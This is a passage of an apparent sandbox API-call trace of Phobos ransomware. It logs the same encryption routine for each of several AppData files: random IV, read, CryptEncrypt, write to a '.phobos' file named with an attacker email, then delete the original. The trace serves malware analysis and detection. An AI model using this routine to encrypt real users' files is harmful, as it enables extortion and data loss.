halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsf-ctbl.fsf")) returned 1 [0188.697] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.698] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=128) returned 1 [0188.698] CloseHandle (hObject=0x178) returned 1 [0188.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig")) returned 0x2020 [0188.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.698] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.698] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.699] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d28) returned 1 [0188.699] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.699] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x80, lpOverlapped=0x0) returned 1 [0188.700] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0188.700] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0188.700] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0188.700] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.700] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0188.701] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.701] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0188.701] CryptDestroyKey (hKey=0xa32d28) returned 1 [0188.701] CloseHandle (hObject=0x178) returned 1 [0188.701] CloseHandle (hObject=0x134) returned 1 [0188.701] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig")) returned 1 [0188.702] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.704] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1122) returned 1 [0188.704] CloseHandle (hObject=0x134) returned 1 [0188.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf")) returned 0x2020 [0188.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.704] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.704] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.795] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.795] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.795] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x462, lpOverlapped=0x0) returned 1 [0188.796] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x470, dwBufLen=0x470 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x470) returned 1 [0188.796] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x470, lpOverlapped=0x0) returned 1 [0188.797] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0188.797] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.797] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0188.797] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.797] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0188.798] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.798] CloseHandle (hObject=0x134) returned 1 [0188.798] CloseHandle (hObject=0x194) returned 1 [0188.798] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf")) returned 1 [0188.799] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.800] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16384) returned 1 [0188.800] CloseHandle (hObject=0x194) returned 1 [0188.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl")) returned 0x2020 [0188.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.800] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.800] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.801] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.801] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.801] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4000, lpOverlapped=0x0) returned 1 [0188.803] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010, dwBufLen=0x4010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010) returned 1 [0188.803] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4010, lpOverlapped=0x0) returned 1 [0188.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0188.805] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.805] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0188.805] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.805] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0188.805] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.805] CloseHandle (hObject=0x194) returned 1 [0188.805] CloseHandle (hObject=0x134) returned 1 [0188.805] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog_RunOnce.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog_runonce.etl")) returned 1 [0188.807] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.807] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=236865) returned 1 [0188.807] CloseHandle (hObject=0x134) returned 1 [0188.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1]")) returned 0x2020 [0188.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.808] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.808] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.809] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.809] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x39d41, lpOverlapped=0x0) returned 1 [0188.894] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x39d50, dwBufLen=0x39d50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x39d50) returned 1 [0188.896] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x39d50, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x39d50, lpOverlapped=0x0) returned 1 [0188.899] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0188.899] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.899] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0188.899] CryptDestroyKey (hKey=0xa32c28) returned 1 [0188.899] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0188.899] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.899] CloseHandle (hObject=0x134) returned 1 [0188.899] CloseHandle (hObject=0x194) returned 1 [0188.900] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\28-8f3193-f30905ea[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\28-8f3193-f30905ea[1]")) returned 1 [0188.902] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.903] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1332) returned 1 [0188.903] CloseHandle (hObject=0x194) returned 1 [0188.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2]")) returned 0x2020 [0188.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.904] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.904] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.904] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0188.904] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.904] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x534, lpOverlapped=0x0) returned 1 [0188.914] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x540, dwBufLen=0x540 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x540) returned 1 [0188.914] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x540, lpOverlapped=0x0) returned 1 [0188.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0188.915] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.915] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, 